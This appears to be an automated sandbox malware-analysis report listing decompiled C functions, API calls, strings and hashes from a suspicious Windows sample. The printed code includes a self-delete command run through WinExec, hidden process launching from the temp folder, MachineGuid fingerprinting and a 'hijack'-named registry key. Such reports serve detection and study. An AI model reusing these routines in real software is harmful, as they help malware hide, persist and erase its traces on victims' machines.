                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                          • String ID: %s%s %s %s$0011
                                                                                                                                                                          • API String ID: 3552933064-2132516514
                                                                                                                                                                          • Opcode ID: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
                                                                                                                                                                          • Instruction ID: 67bf52551a5dba2018d4aeac715347b552078b1bc39281a068a263b1fa8e7f35
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
                                                                                                                                                                          • Instruction Fuzzy Hash: D411B6B6C00248ABE714EB90DC96FDD777CEB14750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				int _t18;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
				if(_t18 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}








                                                                                                                                                                          0x1001a1d6
                                                                                                                                                                          0x1001a1e5
                                                                                                                                                                          0x1001a1ed
                                                                                                                                                                          0x1001a1f4
                                                                                                                                                                          0x1001a1fb
                                                                                                                                                                          0x1001a209
                                                                                                                                                                          0x1001a22b
                                                                                                                                                                          0x1001a233
                                                                                                                                                                          0x1001a239
                                                                                                                                                                          0x1001a243
                                                                                                                                                                          0x1001a249
                                                                                                                                                                          0x1001a249
                                                                                                                                                                          0x1001a256

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                          • _memset.LIBCMT ref: 1001A209
                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                                          • String ID: D
                                                                                                                                                                          • API String ID: 1151464618-2746444292
                                                                                                                                                                          • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                                          • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                                          • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                                          0x1001a269
                                                                                                                                                                          0x1001a27e
                                                                                                                                                                          0x1001a286
                                                                                                                                                                          0x1001a29b
                                                                                                                                                                          0x1001a2b1
                                                                                                                                                                          0x1001a2ca
                                                                                                                                                                          0x1001a2db
                                                                                                                                                                          0x1001a2e4

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                          • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                          • API String ID: 2874319085-10483710
                                                                                                                                                                          • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                                          • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                                          • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                          			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);
					E10001A90( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                                          0x1001a600
                                                                                                                                                                          0x1001a600
                                                                                                                                                                          0x1001a603
                                                                                                                                                                          0x1001a605
                                                                                                                                                                          0x1001a610
                                                                                                                                                                          0x1001a611
                                                                                                                                                                          0x1001a61e
                                                                                                                                                                          0x1001a630
                                                                                                                                                                          0x1001a635
                                                                                                                                                                          0x1001a63c
                                                                                                                                                                          0x1001a651
                                                                                                                                                                          0x1001a667
                                                                                                                                                                          0x1001a674
                                                                                                                                                                          0x1001a67c
                                                                                                                                                                          0x1001a67f
                                                                                                                                                                          0x1001a685
                                                                                                                                                                          0x1001a688
                                                                                                                                                                          0x1001a68b
                                                                                                                                                                          0x1001a68e
                                                                                                                                                                          0x1001a691
                                                                                                                                                                          0x1001a695
                                                                                                                                                                          0x1001a6a5
                                                                                                                                                                          0x1001a6b9
                                                                                                                                                                          0x1001a6bc
                                                                                                                                                                          0x1001a6c0
                                                                                                                                                                          0x1001a6c9
                                                                                                                                                                          0x1001a6d6
                                                                                                                                                                          0x1001a6de
                                                                                                                                                                          0x1001a6df
                                                                                                                                                                          0x1001a6e4
                                                                                                                                                                          0x1001a6ea
                                                                                                                                                                          0x1001a6ef
                                                                                                                                                                          0x1001a6f1
                                                                                                                                                                          0x1001a6fb
                                                                                                                                                                          0x1001a6fb
                                                                                                                                                                          0x1001a707
                                                                                                                                                                          0x1001a715
                                                                                                                                                                          0x1001a71b
                                                                                                                                                                          0x1001a725
                                                                                                                                                                          0x1001a730
                                                                                                                                                                          0x1001a73a

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001A651
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A170: FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                                            • Part of subcall function 1001A170: FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                            • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                          • String ID: .exe$baidu.exe
                                                                                                                                                                          • API String ID: 3164538923-2273953317
                                                                                                                                                                          • Opcode ID: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                                          • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                                          • Opcode Fuzzy Hash: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                                          • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                          			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022ADF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                                          0x1001fdc0
                                                                                                                                                                          0x1001fdc0
                                                                                                                                                                          0x1001fdc3
                                                                                                                                                                          0x1001fdc5
                                                                                                                                                                          0x1001fdd0
                                                                                                                                                                          0x1001fdd1
                                                                                                                                                                          0x1001fdde
                                                                                                                                                                          0x1001fde5
                                                                                                                                                                          0x1001fdfa
                                                                                                                                                                          0x1001fe02
                                                                                                                                                                          0x1001fe17
                                                                                                                                                                          0x1001fe23
                                                                                                                                                                          0x1001fe37
                                                                                                                                                                          0x1001fe45
                                                                                                                                                                          0x1001fe4e
                                                                                                                                                                          0x1001fe62
                                                                                                                                                                          0x1001fe71
                                                                                                                                                                          0x1001fe7c
                                                                                                                                                                          0x1001fe81
                                                                                                                                                                          0x1001fe8b
                                                                                                                                                                          0x1001fe93
                                                                                                                                                                          0x1001fe9d

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                                            • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                            • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                            • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                          • String ID: %s%s 200 %s
                                                                                                                                                                          • API String ID: 3552933064-2772210913
                                                                                                                                                                          • Opcode ID: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                                          • Instruction ID: 9fe4303920e8fa691f1d764f20975ef76de67e86ffe0158f2e00fcfb91787ceb
                                                                                                                                                                          • Opcode Fuzzy Hash: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 341198B6C00208ABE714EB90DC56FDE7778EB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12); // executed
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                                          0x1001f990
                                                                                                                                                                          0x1001f990
                                                                                                                                                                          0x1001f999
                                                                                                                                                                          0x1001f9ae
                                                                                                                                                                          0x1001f9b6
                                                                                                                                                                          0x1001f9c8
                                                                                                                                                                          0x1001f9e1
                                                                                                                                                                          0x1001f9f8
                                                                                                                                                                          0x1001fa08
                                                                                                                                                                          0x1001fa10
                                                                                                                                                                          0x1001fa14
                                                                                                                                                                          0x1001fa19
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001fa1f
                                                                                                                                                                          0x1001fa25

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                                            • Part of subcall function 1001A2F0: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                            • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                          • API String ID: 3138967372-3622423033
                                                                                                                                                                          • Opcode ID: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                                          • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                                          • Opcode Fuzzy Hash: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;
				long _t11;
				long _t13;

				_v12 = 0;
				_v8 = 0;
				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
				if(_t11 == 0) {
					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
					if(_t13 == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					return _v12;
				}
				return 0;
			}







                                                                                                                                                                          0x1001a2f6
                                                                                                                                                                          0x1001a2fd
                                                                                                                                                                          0x1001a319
                                                                                                                                                                          0x1001a321
                                                                                                                                                                          0x1001a33c
                                                                                                                                                                          0x1001a344
                                                                                                                                                                          0x1001a34a
                                                                                                                                                                          0x1001a34a
                                                                                                                                                                          0x1001a355
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1001a35b
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                                          • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                          • API String ID: 3677997916-880526231
                                                                                                                                                                          • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                                          • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                                          • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                                          • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				long _t27;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
				if(_t27 == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}












                                                                                                                                                                          0x1001f4a6
                                                                                                                                                                          0x1001f4ad
                                                                                                                                                                          0x1001f4b4
                                                                                                                                                                          0x1001f4ce
                                                                                                                                                                          0x1001f4d6
                                                                                                                                                                          0x1001f500
                                                                                                                                                                          0x1001f502
                                                                                                                                                                          0x1001f508
                                                                                                                                                                          0x1001f50e
                                                                                                                                                                          0x1001f514
                                                                                                                                                                          0x1001f51a
                                                                                                                                                                          0x1001f520
                                                                                                                                                                          0x1001f526
                                                                                                                                                                          0x1001f534
                                                                                                                                                                          0x1001f540
                                                                                                                                                                          0x1001f543
                                                                                                                                                                          0x1001f554
                                                                                                                                                                          0x1001f557
                                                                                                                                                                          0x1001f557
                                                                                                                                                                          0x1001f55e
                                                                                                                                                                          0x1001f55e
                                                                                                                                                                          0x1001f56d

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                                          • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp Download File
